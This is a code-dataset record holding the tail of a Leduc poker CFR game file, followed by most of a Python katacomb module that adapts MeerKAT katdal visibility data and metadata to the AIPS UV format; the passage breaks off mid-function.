LeducCFR.available_actions(self.history)\n\t\tself.history.append(action)\n\n\t\tif LeducCFR.is_terminal(self.history):\n\t\t\tterminal = True\n\t\t\tpayoffs = LeducCFR.payoffs(self.history)\n\t\t\tplayer = None\n\t\t\tinformation_set = None\n\t\telse:\n\t\t\t# Play any chance actions\n\t\t\twhile LeducCFR.which_player(self.history) == 0:\n\t\t\t\tself.history.append(LeducCFR.sample_chance_action(self.history))\n\t\t\t\t\n\t\t\tterminal = False\n\t\t\tpayoffs = None\n\t\t\tplayer = LeducCFR.which_player(self.history)\n\t\t\tinformation_set = LeducCFR.information_set(self.history)\n\n\t\treturn player, information_set, terminal, payoffs","sub_path":"regretmatching/leduc_cfr_game.py","file_name":"leduc_cfr_game.py","file_ext":"py","file_size_in_byte":13395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"94870360","text":"from collections import Counter\nimport datetime\nimport logging\nimport time\n\nimport attr\nimport numba\nimport numpy as np\nimport dask.array as da\n\nimport UVDesc\n\nfrom katacomb import AIPSPath, normalise_target_name\nfrom katacomb.util import fmt_bytes\n\nfrom katdal.lazy_indexer import DaskLazyIndexer, dask_getitem\n\nlog = logging.getLogger('katacomb')\n\nONE_DAY_IN_SECONDS = 24*60*60.0\nMAX_AIPS_PATH_LEN = 12\nLIGHTSPEED = 299792458.0\n\n\"\"\" Map correlation characters to correlation id \"\"\"\nCORR_ID_MAP = {('h', 'h'): 0,\n ('v', 'v'): 1,\n ('h', 'v'): 2,\n ('v', 'h'): 3}\n\n\ndef aips_timestamps(timestamps, midnight):\n \"\"\"\n Given katdal timestamps and midnight on the observation date in UTC,\n calculates the Julian Day offset from midnight on the observation date.\n\n Parameters\n ----------\n timestamps : np.ndarray\n katdal UTC timestamps\n midnight : float\n midnight on day of observation in UTC\n\n Returns\n -------\n np.ndarray\n AIPS Julian Day timestamps, offset from midnight on the\n observation date.\n \"\"\"\n return (timestamps - midnight) / ONE_DAY_IN_SECONDS\n\n\ndef katdal_timestamps(timestamps, midnight):\n \"\"\"\n Given AIPS Julian day timestamps offset from midnight on the day\n of the observation, calculates the katdal UTC timestamp\n\n Parameters\n ----------\n timestamsp : np.ndarray\n AIPS Julian Day timestamps, offset from midnight on the\n observation date.\n midnight : float\n midnight on day of observation in UTC\n\n Returns\n -------\n np.ndarray\n katdal UTC timestamps\n \"\"\"\n return midnight + (timestamps * ONE_DAY_IN_SECONDS)\n\n\ndef katdal_ant_nr(ant_name):\n \"\"\"Get a unique integer corresponding to an antenna name.\n\n Given an antenna name of the form either 'mnnnp' or 'snnnnp'\n where 'm' or 's' is a character constant denoting 'MeerKAT'\n and 'SKA' dishes respectively, 'nnn' (or 'nnnn') is the\n antenna number and 'p' is the (optional) polarisation, returns\n an ordered antenna number as an integer.\n\n The ordered antenna number is defined as 'nnn' for MeerKAT\n dishes and 'nnnn + 64' for SKA dishes.\n\n Parameters\n ----------\n ant_name : str\n Antenna Name\n\n Returns\n ------\n integer\n antenna number in antenna name\n \"\"\"\n try:\n if ant_name[0] == 'm':\n nr = int(ant_name[1:4])\n elif ant_name[0] == 's':\n nr = int(ant_name[1:5]) + 64\n else:\n raise ValueError\n except (ValueError, IndexError):\n raise ValueError(\"Invalid antenna name '%s'\" % ant_name)\n return nr\n\n\ndef aips_ant_nr(ant_name):\n \"\"\"Given antenna name get its AIPS antenna number.\n\n This is done by adding one to the result of\n :func:`katdal_ant_nr`.\n\n Parameters\n ----------\n ant_name : str\n Antenna Name\n\n Returns\n ------\n integer\n AIPS antenna number from antenna name\n \"\"\"\n return katdal_ant_nr(ant_name) + 1\n\n\ndef katdal_ant_name(aips_ant_nr):\n \"\"\"Return antenna name, given the AIPS antenna number\"\"\"\n if aips_ant_nr < 65:\n res = f'm{(aips_ant_nr-1):03d}'\n else:\n res = f's{(aips_ant_nr-65):04d}'\n return res\n\n\ndef aips_uvw(uvw, refwave):\n \"\"\"\n Converts katdal UVW coordinates in metres to AIPS UVW coordinates\n in wavelengths *at the reference frequency*.\n\n Notes\n -----\n Wavelengths at the reference frequency differs from AIPS documentation\n (AIPS Memo 117, Going AIPS, Obitdoc) which state that UVW coordinates\n should be in lightseconds.\n\n Parameters\n ----------\n uvw : np.ndarray\n katdal UVW coordinates in metres\n refwave : float\n Reference wavelength in metres\n\n Returns\n -------\n np.ndarray\n AIPS UVW coordinates in wavelengths at the reference frequency\n \"\"\"\n return uvw / refwave\n\n\ndef katdal_uvw(uvw, refwave):\n \"\"\"\n Converts AIPS UVW coordinates in wavelengths *at the reference frequency*\n to katdal UVW coordinates in metres. Set :function:`aips_uvw` for\n further discussion.\n\n Parameters\n ----------\n uvw : np.ndarray\n AIPS UVW coordinates in wavelengths at the reference frequency\n refwave : float\n Reference wavelength in metres\n\n Returns\n -------\n np.ndarray\n katdal UVW coordinates, in metres\n \"\"\"\n return refwave * uvw\n\n\ndef aips_source_name(name, used=[]):\n \"\"\"\n Truncates to MAX_AIPS_PATH_LEN, padding with spaces and appending\n repeat number to repeat names.\n \"\"\"\n return normalise_target_name(name, used, max_length=MAX_AIPS_PATH_LEN)\n\n\ndef aips_catalogue(katdata, nif):\n \"\"\"\n Creates a catalogue of AIPS sources from :attribute:`katdata.catalogue`\n It resembles :attribute:`katdal.Dataset.catalogue`.\n\n Returns a list of dictionaries following the specification\n of the AIPS SU table in AIPS Memo 117.\n\n Notes\n -----\n At present, the following is set for each source:\n\n 1. AIPS Source ID\n 2. Source name\n 3. Source position\n\n Other quantities such as:\n\n 1. Flux\n 2. Frequency Offset\n 3. Rest Frequency\n 4. Bandwidth\n\n are defaulted to zero for now as these are not strictly required for\n the purposes of the continuum pipeline. See Bill Cotton's description\n of parameter and why it is unnecessary above each row entry in the code.\n\n Relevant keys ('[IQUV]FLUX', 'LSRVEL', 'FREQOFF', 'RESTREQ') are repeated\n `nif` times to allow equal subdivision of the band into IFs.\n\n Parameters\n ----------\n katdata : :class:`katdal.Dataset`\n katdal object\n nif : int\n Number of IFs to split band into\n\n Returns\n -------\n list of dicts\n List of dictionaries where each dictionary defines an AIPS source.\n\n \"\"\"\n catalogue = []\n\n zero = np.asarray([0.0, 0.0])\n\n used = []\n\n for aips_i, t in enumerate(katdata.catalogue.targets, 1):\n # Nothings have no position!\n if \"Nothing\" == t.name:\n radec = zero\n aradec = zero\n else:\n radec = t.radec()\n aradec = t.apparent_radec()\n\n # Right Ascension and Declination\n ra, dec = np.rad2deg(radec)\n # Apparent position\n raa, deca = np.rad2deg(aradec)\n\n source_name = aips_source_name(t.name, used)\n\n aips_source_data = {\n # Fill in data derived from katpoint target\n 'ID. NO.': [aips_i],\n # SOURCE keyword requires 16 characters.\n 'SOURCE': [source_name.ljust(16, ' ')],\n 'RAEPO': [ra],\n 'DECEPO': [dec],\n 'RAOBS': [raa],\n 'DECOBS': [deca],\n 'RAAPP': [raa],\n 'DECAPP': [deca],\n 'EPOCH': [2000.0],\n\n # NOTE(bcotton)\n # CALCODE - is used to distinguish type and usage of calibrator\n # source and is used to carry intent from the scheduling process,\n # e.g. this is a bandpass calibrator.\n # Since this data will likely never be used to derive the\n # external calibration, it is unlikely to ever be used.\n 'CALCODE': [' ' * 4], # 4 spaces for calibrator code\n\n # Following seven key-values technically vary by\n # spectral window, but we're only handling one SPW\n # at a time so it doesn't matter\n\n # NOTE(bcotton)\n # I/Q/U/VFLUX are the flux densities, per spectral window,\n # either determined from a standard model or derived in the\n # calibration process from a standard calibrator.\n # Since this data will likely never be used to derive the\n # external calibration, they are unlikely to ever be used.\n 'IFLUX': [0.0] * nif,\n 'QFLUX': [0.0] * nif,\n 'VFLUX': [0.0] * nif,\n 'UFLUX': [0.0] * nif,\n\n # NOTE(bcotton)\n # LSRVEL, FREQOFF,RESTFREQ are used in making Doppler corrections\n # for the Earth's motion. Since MeerKAT data can, in principle\n # include both HI and OH lines (separate spectral windows?)\n # the usage may be complicated. Look at the documentation for\n # either Obit/CVel or AIPS/CVEL for more details on usage.\n # I'm not sure how the Doppler corrections will be made but\n # likely not on the data in question. In practice, for\n # NRAO related telescopes this information is not reliable\n # and can be supplied as parameters to the correction software.\n # There are only a handful of transition available to MeerKAT\n # which all have very well known rest frequencies.\n # I don't know if MeerKAT plans online Doppler tracking which\n # I think is a bad idea anyway.\n 'LSRVEL': [0.0] * nif, # Velocity\n 'FREQOFF': [0.0] * nif, # Frequency Offset\n 'RESTFREQ': [0.0] * nif, # Rest Frequency\n\n # NOTE(bcotton)\n # BANDWIDTH was probably a mistake although, in principle,\n # it can be used to override the value in the FQ table.\n # I'm not sure if anything actually uses this.\n 'BANDWIDTH': [0.0], # Bandwidth of the SPW\n\n # NOTE(bcotton)\n # PMRA, PMDEC are the proper motions of Galactic or extragalactic\n # objects. These are a rather muddled implementation as they also\n # need both equinox and epoch of the standard position, which for\n # Hipparcos positions are different. In practice, these are usually\n # included in the apparent position of date. I can't see these ever\n # being useful for MeerKAT as they are never more than a few mas/yr.\n # There is a separate Planetary Ephemeris (PO) table for solar\n # system objects which may be needed for the Sun or planets\n # (a whole different bucket of worms).\n # I can't see these ever being useful for MeerKAT as they are never\n # more than a few mas/yr. There is a separate\n # Planetary Ephemeris (PO) table for solar system objects which\n # may be needed for the Sun or planets\n # (a whole different bucket of worms).\n 'PMRA': [0.0], # Proper Motion in Right Ascension\n 'PMDEC': [0.0], # Proper Motion in Declination\n\n # NOTE(bcotton)\n # QUAL can be used to subdivide data for a given \"SOURCE\"\n # (say for a mosaic).# \"SOURCE\" plus \"QUAL\" uniquely define\n # an entry in the table. The MeerKAT field of view is SO HUGE\n # I can't see this being needed.\n 'QUAL': [0], # Source Qualifier Number\n }\n\n used.append(source_name)\n\n catalogue.append(aips_source_data)\n\n return catalogue\n\n\nMEERKAT = 'MeerKAT'\n\n\nclass _KatdalTransformer(object):\n \"\"\"\n Small wrapper around a katdal data attribute.\n\n Performs two functions\n\n 1. Transforms katdal data into AIPS format\n 2. Implements __getitem__ to proxy indexing calls\n to the underlying katdal data attribute.\n\n Basic idea is as follows:\n\n .. code-block:: python\n\n def __init__(self, ...):\n time_xform = lambda idx: (K.timestamps[idx] - midnight) / 86400.0\n self._time_xformer = _KatdalTransformer(time_xform,\n shape=lambda: K.timestamps.shape,\n dtype=K.timestamps.dtype)\n\n @property\n def timestamps(self):\n return self._time_xformer\n \"\"\"\n def __init__(self, transform, shape, dtype):\n self._transform = transform\n self._shape = shape\n self._dtype = dtype\n\n def __getitem__(self, index):\n return self._transform(index)\n\n @property\n def shape(self):\n return self._shape()\n\n @property\n def dtype(self):\n return self._dtype\n\n def __len__(self):\n return self.shape[0]\n\n\nclass KatdalAdapter(object):\n \"\"\"\n Adapts a :class:`katdal.DataSet` to look\n a bit more like a UV file.\n\n This is not a true adapter, but perhaps if\n called that enough, it will become one.\n \"\"\"\n\n def __init__(self, katds):\n \"\"\"\n Constructs a KatdalAdapter.\n\n Parameters\n ----------\n katds : :class:`katdal.DataSet`\n An opened katdal dataset.\n \"\"\"\n self._katds = katds\n self._cache = {}\n self._nif = 1\n self._catalogue = aips_catalogue(katds, self._nif)\n\n def _vis_xformer(index):\n \"\"\"\n Transform katdal visibilities indexed by ``index``\n into AIPS visiblities.\n \"\"\"\n if isinstance(self._katds.vis, DaskLazyIndexer):\n arrays = [self._katds.vis, self._katds.weights, self._katds.flags]\n vis, weights, flags = [dask_getitem(array.dataset, np.s_[index, :, :])\n for array in arrays]\n else:\n vis = da.from_array(self._katds.vis[index])\n weights = da.from_array(self._katds.weights[index])\n flags = da.from_array(self._katds.flags[index])\n # Apply flags by negating weights\n weights = da.where(flags, -32767.0, weights)\n # Split complex vis dtype into real and imaginary parts\n vis_dtype = vis.dtype.type(0).real.dtype\n vis = vis.view(vis_dtype).reshape(vis.shape + (2,))\n out_array = np.empty(weights.shape + (3,), dtype=vis_dtype)\n da.store([vis, weights], [out_array[..., 0:2], out_array[..., 2]], lock=False)\n return out_array\n\n def _time_xformer(index):\n \"\"\"\n Transform katdal timestamps indexed by ``index``\n into AIPS timestamps. These are the Julian days\n since midnight on the observation date\n \"\"\"\n return aips_timestamps(self._katds.timestamps[index], self.midnight)\n\n # Convert katdal UVW into AIPS UVW\n def _u_xformer(i): return aips_uvw(self._katds.u[i], self.refwave)\n\n def _v_xformer(i): return aips_uvw(self._katds.v[i], self.refwave)\n\n def _w_xformer(i): return aips_uvw(self._katds.w[i], self.refwave)\n\n # Set up the actual transformers\n self._vis_xformer = _KatdalTransformer(_vis_xformer,\n shape=lambda: self._katds.vis.shape,\n dtype=self._katds.weights.dtype)\n\n self._time_xformer = _KatdalTransformer(_time_xformer,\n shape=lambda: self._katds.timestamps.shape,\n dtype=self._katds.timestamps.dtype)\n\n self._u_xformer = _KatdalTransformer(_u_xformer,\n shape=lambda: self._katds.u.shape,\n dtype=self._katds.u.dtype)\n self._v_xformer = _KatdalTransformer(_v_xformer,\n shape=lambda: self._katds.u.shape,\n dtype=self._katds.u.dtype)\n self._w_xformer = _KatdalTransformer(_w_xformer,\n shape=lambda: self._katds.u.shape,\n dtype=self._katds.u.dtype)\n\n @property\n def uv_timestamps(self):\n \"\"\" Returns times in Julian days since midnight on the Observation Date \"\"\"\n return self._time_xformer\n\n @property\n def uv_vis(self):\n \"\"\" Returns AIPS visibilities \"\"\"\n return self._vis_xformer\n\n @property\n def uv_u(self):\n \"\"\" U coordinate in seconds \"\"\"\n return self._u_xformer\n\n @property\n def uv_v(self):\n \"\"\" V coordinate in seconds \"\"\"\n return self._v_xformer\n\n @property\n def uv_w(self):\n \"\"\" W coordinate in seconds \"\"\"\n return self._w_xformer\n\n def scans(self):\n \"\"\"\n Generator iterating through scans in an observation.\n Proxies :meth:`katdal.Dataset.scans`.\n\n Yields\n ------\n scan_index : int\n Scan index\n state : str\n State\n aips_source : dict\n AIPS Source\n\n \"\"\"\n for si, state, target in self._katds.scans():\n yield si, state, self._catalogue[self.target_indices[0]]\n\n def aips_path(self, **kwargs):\n \"\"\"\n Constructs an aips path from a :class:`KatdalAdapter`\n\n Parameters\n ----------\n **kwargs (optional): :obj:\n See :class:`AIPSPath` for information on\n keyword arguments.\n\n Returns\n -------\n :class:`AIPSPath`\n AIPS path describing this observation\n \"\"\"\n name = kwargs.pop('name', None)\n dtype = kwargs.get('dtype', \"AIPS\")\n\n if name is None:\n name = self._katds.obs_params.get('capture_block_id',\n self._katds.experiment_id)\n if dtype == 'AIPS':\n name = name[-MAX_AIPS_PATH_LEN:]\n elif dtype == \"FITS\":\n name += '.uvfits'\n else:\n raise ValueError('Invalid dtype %s' % dtype)\n\n return AIPSPath(name=name, **kwargs)\n\n def select(self, **kwargs):\n \"\"\"\n Proxies :meth:`katdal.select` and adds optional `nif` selection.\n\n Parameters\n ----------\n nif (optional): int\n Number of AIPSish IFs of equal frequency width to split the band into.\n **kwargs (optional): dict\n :meth:`katdal.select` arguments. See katdal documentation for information\n \"\"\"\n nif = kwargs.pop('nif', self.nif)\n result = self._katds.select(**kwargs)\n # Make sure any possible new channel range in selection is permitted\n self.nif = nif\n return result\n\n @property\n def size(self):\n return self._katds.size\n\n @property\n def shape(self):\n \"\"\" Proxies :meth:`katdal.DataSet.shape` \"\"\"\n return self._katds.shape\n\n @property\n def catalogue(self):\n \"\"\"\n AIPS source catalogue, resembling\n :attribute:`katdal.Dataset.catalogue`.\n \"\"\"\n return self._catalogue\n\n @property\n def scan_indices(self):\n \"\"\" Proxies :attr:`katdal.DataSet.scan_indices` \"\"\"\n return self._katds.scan_indices\n\n @property\n def target_indices(self):\n \"\"\" Proxies :attr:`katdal.DataSet.target_indices` \"\"\"\n return self._katds.target_indices\n\n @property\n def name(self):\n \"\"\" Proxies :attr:`katdal.DataSet.name` \"\"\"\n return self._katds.name\n\n @property\n def experiment_id(self):\n \"\"\" Proxies :attr:`katdal.DataSet.name` \"\"\"\n return self._katds.experiment_id\n\n @property\n def observer(self):\n \"\"\" Proxies :attr:`katdal.DataSet.observer` \"\"\"\n return self._katds.observer\n\n @property\n def description(self):\n \"\"\" Proxies :attr:`katdal.DataSet.description` \"\"\"\n return self._katds.description\n\n @property\n def version(self):\n \"\"\" Proxies :attr:`katdal.DataSet.version` \"\"\"\n return self._katds.version\n\n @property\n def katdal(self):\n \"\"\" The `katdal.DataSet` adapted by this object \"\"\"\n return self._katds\n\n @property\n def obsdat(self):\n \"\"\"\n Returns\n -------\n str\n The observation date\n \"\"\"\n start = time.gmtime(self._katds.start_time.secs)\n return time.strftime('%Y-%m-%d', start)\n\n @property\n def midnight(self):\n \"\"\"\n Returns\n -------\n float\n Midnight on the observation date in unix seconds\n \"\"\"\n return time.mktime(time.strptime(self.obsdat, '%Y-%m-%d'))\n\n @property\n def today(self):\n \"\"\"\n Returns\n -------\n str\n The current date\n \"\"\"\n return datetime.date.today().strftime('%Y-%m-%d')\n\n @property\n def obs_params(self):\n \"\"\" Proxies :attr:`katdal.DataSet.obs_params` \"\"\"\n return getattr(self._katds, 'obs_params', {})\n\n def correlator_products(self):\n \"\"\"\n Returns\n -------\n list\n CorrelatorProduct(antenna1, antenna2, correlator_product_id)\n objects, with the correlator_product_id mapped as follows:\n\n .. code-block:: python\n\n { ('h','h'): 0,\n ('v','v'): 1,\n ('h','v'): 2,\n ('v','h'): 3 }\n \"\"\"\n class CorrelatorProduct(object):\n def __init__(self, ant1, ant2, cid):\n self.ant1 = ant1\n self.ant2 = ant2\n self.cid = cid\n\n @property\n def ant1_ix(self):\n return katdal_ant_nr(self.ant1.name)\n\n @property\n def ant2_ix(self):\n return katdal_ant_nr(self.ant2.name)\n\n @property\n def aips_ant1_ix(self):\n return aips_ant_nr(self.ant1.name)\n\n @property\n def aips_ant2_ix(self):\n return aips_ant_nr(self.ant2.name)\n\n @property\n def aips_bl_ix(self):\n \"\"\" This produces the AIPS baseline index random parameter \"\"\"\n return self.aips_ant1_ix * 256.0 + self.aips_ant2_ix\n\n # { name : antenna } mapping\n antenna_map = {a.name: a for a in self._katds.ants}\n products = []\n\n for a1_corr, a2_corr in self._katds.corr_products:\n # These can look like 'm008v', 'm016h' etc. for MeerKAT\n # or 's0008v', 's0018h' etc. for SKA.\n # Separate into name 'm008' and polarisation 'v'.\n a1_name = a1_corr[:-1]\n a1_type = a1_corr[-1:].lower()\n\n a2_name = a2_corr[:-1]\n a2_type = a2_corr[-1:].lower()\n\n # Derive the correlation id\n try:\n cid = CORR_ID_MAP[(a1_type, a2_type)]\n except KeyError:\n raise ValueError(\"Invalid Correlator Product \"\n \"['%s, '%s']\" % (a1_corr, a2_corr))\n\n # Look up katdal antenna pair\n a1 = antenna_map[a1_name]\n a2 = antenna_map[a2_name]\n\n products.append(CorrelatorProduct(a1, a2, cid))\n\n return products\n\n @property\n def nstokes(self):\n \"\"\"\n Returns\n -------\n int\n The number of stokes parameters in this observation,\n derived from the number of times we see a\n pair of antenna names in the correlation products.\n \"\"\"\n\n # Count the number of times we see a correlation product\n counts = Counter((cp.ant1_ix, cp.ant2_ix) for cp\n in self.correlator_products())\n return max(counts.values())\n\n @property\n def nchan(self):\n \"\"\"\n Returns\n -------\n int\n The number of channels in this observation.\n \"\"\"\n return len(self._katds.channel_freqs)\n\n @property\n def frqsel(self):\n \"\"\"\n The selected spectral window (FORTRAN-index)\n\n .. code-block:: python\n\n KA = KatdalAdapter(katdal.open('...'))\n assert KA.frqsel == 1\n\n Returns\n -------\n int\n The selected spectral window\n \"\"\"\n return self._katds.spw + 1\n\n @property\n def nif(self):\n \"\"\"\n The number of spectral widows to use in the AIPS uv\n data. Must equally subdivide the number of frequency channels\n currently selected.\n\n Returns\n -------\n int\n The number of spectral windows\n \"\"\"\n return self._nif\n\n @nif.setter\n def nif(self, numif):\n if self.nchan % numif != 0:\n raise ValueError('Number of requested IFs (%d) does not divide number of channels (%d)'\n % (numif, self.nchan))\n else:\n self._nif = numif\n self._catalogue = aips_catalogue(self._katds, numif)\n\n @property\n def channel_freqs(self):\n \"\"\"\n Returns\n -------\n list or np.ndarray\n List of channel frequencies\n \"\"\"\n return self._katds.channel_freqs\n\n @property\n def chinc(self):\n \"\"\"\n Returns\n -------\n float\n The channel increment, or width.\n \"\"\"\n return self._katds.channel_width\n\n @property\n def reffreq(self):\n \"\"\"\n Returns\n -------\n float\n The first channel frequency as the reference frequency,\n rather than the centre frequency. See `uv_format.rst`.\n \"\"\"\n return self._katds.channel_freqs[0]\n\n @property\n def refwave(self):\n \"\"\"\n Returns\n -------\n float\n Reference wavelength in metres\n \"\"\"\n return LIGHTSPEED / self.reffreq\n\n @property\n def uv_antenna_keywords(self):\n \"\"\"\n Returns\n -------\n dict\n Dictionary containing updates to the AIPS AN\n antenna table keywords.\n \"\"\"\n\n julian_date = UVDesc.PDate2JD(self.obsdat)\n\n return {\n 'ARRNAM': MEERKAT,\n 'FREQ': self.reffreq, # Reference frequency\n 'FREQID': self.frqsel, # Frequency setup id\n 'RDATE': self.obsdat, # Reference date\n 'NO_IF': self.nif, # Number of spectral windows\n # GST at 0h on reference data in degrees\n 'GSTIA0': UVDesc.GST0(julian_date) * 15.0,\n # Earth's rotation rate (degrees/day)\n 'DEGPDY': UVDesc.ERate(julian_date) * 360.0,\n }\n\n @property\n def uv_antenna_rows(self):\n \"\"\"\n Returns\n -------\n list\n List of dictionaries describing each antenna.\n \"\"\"\n\n return [{\n # MeerKAT antenna information\n 'NOSTA': [aips_ant_nr(a.name)],\n 'ANNAME': [a.name],\n 'STABXYZ': list(a.position_ecef),\n 'DIAMETER': [a.diameter],\n 'POLAA': [90.0],\n\n # Defaults for the rest\n 'POLAB': [0.0],\n 'POLCALA': [0.0, 0.0] * self.nif,\n 'POLCALB': [0.0, 0.0] * self.nif,\n 'POLTYA': ['X'],\n 'POLTYB': ['Y'],\n 'STAXOF': [0.0],\n 'BEAMFWHM': [0.0] * self.nif,\n 'ORBPARM': [],\n 'MNTSTA': [0]\n } for a in sorted(self._katds.ants)]\n\n @property\n def uv_source_keywords(self):\n \"\"\"\n Returns\n -------\n dict\n Dictionary containing updates to the AIPS SU\n source table keywords.\n \"\"\"\n return {\n 'NO_IF': self.nif, # Number of spectral windows\n 'FREQID': self.frqsel, # Frequency setup ID\n 'VELDEF': 'RADIO', # Radio/Optical Velocity?\n # Velocity Frame of Reference (LSR is default)\n 'VELTYP': 'LSR'\n }\n\n @property\n def uv_source_rows(self):\n \"\"\"\n Returns\n -------\n list\n List of dictionaries describing sources.\n \"\"\"\n return [self._catalogue[ti] for ti in self._katds.target_indices]\n\n @property\n def uv_spw_keywords(self):\n \"\"\"\n Returns\n -------\n dict\n Dictionary containing updates to the AIPS FQ\n frequency table keywords.\n \"\"\"\n return {'NO_IF': self.nif}\n\n @property\n def max_antenna_number(self):\n \"\"\"\n Returns\n -------\n integer\n The maximum AIPS antenna number\n \"\"\"\n return max(r['NOSTA'][0] for r in self.uv_antenna_rows)\n\n @property\n def uv_calibration_keywords(self):\n \"\"\"\n Returns\n -------\n dict\n Dictionary containing updates to the AIPS CL\n calibration table keywords.\n \"\"\"\n return {\n 'NO_IF': self.nif,\n 'NO_POL': self.nstokes,\n 'NO_ANT': self.max_antenna_number,\n 'NO_TERM': 1,\n 'MFMOD': 1\n }\n\n @property\n def uv_spw_rows(self):\n \"\"\"\n Returns\n -------\n list\n List of dictionaries describing each\n spectral window.\n \"\"\"\n\n spw = self._katds.spectral_windows[self._katds.spw]\n bandwidth = abs(self.chinc) * self.nchan / self.nif\n\n return [{\n # Fill in data from MeerKAT spectral window\n 'FRQSEL': [self.frqsel], # Frequency setup ID\n 'IF FREQ': [if_num * bandwidth for if_num in range(self.nif)],\n 'CH WIDTH': [self.chinc] * self.nif,\n # Should be 'BANDCODE' according to AIPS MEMO 117!\n 'RXCODE': [spw.band],\n 'SIDEBAND': [spw.sideband] * self.nif,\n 'TOTAL BANDWIDTH': [bandwidth] * self.nif,\n }]\n\n def fits_descriptor(self):\n \"\"\" FITS visibility descriptor setup \"\"\"\n\n nstokes = self.nstokes\n # Set STOKES CRVAL according to AIPS Memo 117\n # { RR: -1.0, LL: -2.0, RL: -3.0, LR: -4.0,\n # XX: -5.0, YY: -6.0, XY: -7.0, YX: -8.0,\n # I: 1, Q: 2, U: 3, V: 4 }\n stokes_crval = 1.0 if nstokes == 1 else -5.0\n stokes_cdelt = -1.0 # cdelt is always -1.0\n\n return {\n 'naxis': 6,\n 'ctype': ['COMPLEX', 'STOKES', 'FREQ', 'IF', 'RA', 'DEC'],\n 'inaxes': [3, self.nstokes, self.nchan // self.nif, self.nif, 1, 1],\n 'cdelt': [1.0, stokes_cdelt, self.chinc, 1.0, 0.0, 0.0],\n 'crval': [1.0, stokes_crval, self.reffreq, 1.0, 0.0, 0.0],\n 'crpix': [1.0, 1.0, 1.0, 1.0, 1.0, 1.0],\n 'crota': [0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n }\n\n def default_table_cmds(self):\n \"\"\"\n Returns\n -------\n dict\n \"\"\"\n return {\n \"AIPS AN\": {\n \"attach\": {'version': 1, 'numIF': self.nif},\n \"keywords\": self.uv_antenna_keywords,\n \"rows\": self.uv_antenna_rows,\n \"write\": True,\n },\n \"AIPS FQ\": {\n \"attach\": {'version': 1, 'numIF': self.nif},\n \"keywords\": self.uv_spw_keywords,\n \"rows\": self.uv_spw_rows,\n \"write\": True,\n },\n \"AIPS SU\": {\n \"attach\": {'version': 1, 'numIF': self.nif},\n \"keywords\": self.uv_source_keywords,\n \"rows\": self.uv_source_rows,\n \"write\": True,\n },\n \"AIPS NX\": {\n \"attach\": {'version': 1},\n },\n }\n\n def uv_descriptor(self):\n \"\"\"\n Returns\n -------\n dict\n UV descriptor dictionary, derived from the metadata\n of a katdal file. Suitable for merging into a UVDesc dictionary\n when creating a new AIPS UV data file.\n \"\"\"\n\n # FITS descriptor is the base for our uv_descriptor\n desc = self.fits_descriptor()\n\n desc.update({\n # Observation\n 'obsdat': self.obsdat,\n 'observer': self.observer,\n 'origin': 'katdal export',\n 'JDObs': UVDesc.PDate2JD(self.obsdat),\n 'date': self.today,\n 'epoch': 2000.0,\n 'equinox': 2000.0,\n 'teles': MEERKAT,\n 'instrume': self._katds.spectral_windows[self._katds.spw].product,\n\n 'isort': 'TB', # Time, Baseline sort order\n 'object': 'MULTI', # Source, this implies multiple sources\n\n 'nvis': 0,\n 'firstVis': 0,\n 'numVisBuff': 0,\n\n # These are automatically calculated, but\n # are left here for illustration\n # 'incs' : 3, # Stokes 1D increment. 3 floats in COMPLEX\n # 'incf' : 12, # Frequency 1D increment, 12 = 3*4 STOKES\n # 'incif' : 49152, # Spectral window 1D increment\n # # 49152 = 3*4*4096 CHANNELS\n\n # Regular parameter indices into ctypes/inaxes/cdelt etc.\n 'jlocc': 0, # COMPLEX\n 'jlocs': 1, # SOURCES\n 'jlocf': 2, # FREQ\n 'jlocif': 3, # IF\n 'jlocr': 4, # RA\n 'jlocd': 5, # DEC\n })\n\n # Random parameter keys, indices and coordinate systems\n # index == -1 indicates its absence in the Visibility Buffer\n RP = attr.make_class(\"RandomParameters\", [\"key\", \"index\", \"type\"])\n\n random_parameters = [\n RP('ilocu', 0, 'UU-L-SIN'), # U Coordinate\n RP('ilocv', 1, 'VV-L-SIN'), # V Coordinate\n RP('ilocw', 2, 'WW-L-SIN'), # W Coordinate\n RP('ilocb', 3, 'BASELINE'), # Baseline ID\n RP('iloct', 4, 'TIME1'), # Timestamp\n RP('iloscu', 5, 'SOURCE'), # Source Index\n\n RP('ilocfq', -1, 'FREQSEL'), # Frequency setup ID\n RP('ilocit', -1, 'INTTIM'), # Integration Time\n RP('ilocid', -1, 'CORR-ID'), # VLBA-specific\n RP('ilocws', -1, 'WEIGHT'), # Ignore\n\n # The following used when 'BASELINE' id\n # can't be calculated because number of antenna > 255\n RP('iloca1', -1, 'ANTENNA1'),\n RP('iloca2', -1, 'ANTENNA2'),\n RP('ilocsa', -1, 'SUBARRAY'),\n ]\n\n # Construct parameter types for existent random parameters\n ptype = [rp.type for rp in random_parameters if not rp.index == -1]\n\n # Update with random parameters\n desc.update({rp.key: rp.index for rp in random_parameters})\n desc.update({'nrparm': len(ptype), 'ptype': ptype})\n\n return desc\n\n\ndef time_chunked_scans(kat_adapter, time_step=4):\n \"\"\"\n Generator returning vibility data each scan, chunked\n on the time dimensions in chunks of ``time_step``.\n Internally, this iterates through :code:`kat_adapter.scan()`\n to produce a :code:`(si, state, source, data_gen)` tuple,\n where :code:`si` is the scan index, :code:`state` the state\n of the scan and :code:`source` the AIPS source dictionary.\n :code:`data_gen` is itself a generator that yields\n :code:`time_step` chunks of the data.\n\n Parameters\n ----------\n kat_adapter : `KatdalAdapter`\n Katdal Adapter\n time_step : integer\n Size of time chunks (Default 4).\n 4 timesteps x 1024 channels x 2016 baselines x 4 stokes x 12 bytes\n works out to about 0.5 GB.\n\n Yields\n ------\n si : int\n Scan index\n state : str\n Scan state\n aips source : dict\n Dictionary describing AIPS source\n data_gen : generator\n Generator yielding (u, v, w, time, baseline_index, visibilities)\n where :code:`len(time) <= time_step`\n \"\"\"\n cp = kat_adapter.correlator_products()\n nstokes = kat_adapter.nstokes\n\n # Lexicographically sort correlation products on (a1, a2, cid)\n def sort_fn(x): return (cp[x].ant1_ix, cp[x].ant2_ix, cp[x].cid)\n\n cp_argsort = np.asarray(sorted(range(len(cp)), key=sort_fn))\n corr_products = np.asarray([cp[i] for i in cp_argsort])\n\n # Use first stokes parameter index of each baseline\n bl_argsort = cp_argsort[::nstokes]\n\n # Take baseline products so that we don't recompute\n # UVW coordinates for all correlator products\n bl_products = corr_products.reshape(-1, nstokes)[:, 0]\n nbl, = bl_products.shape\n\n # AIPS baseline IDs\n aips_baselines = 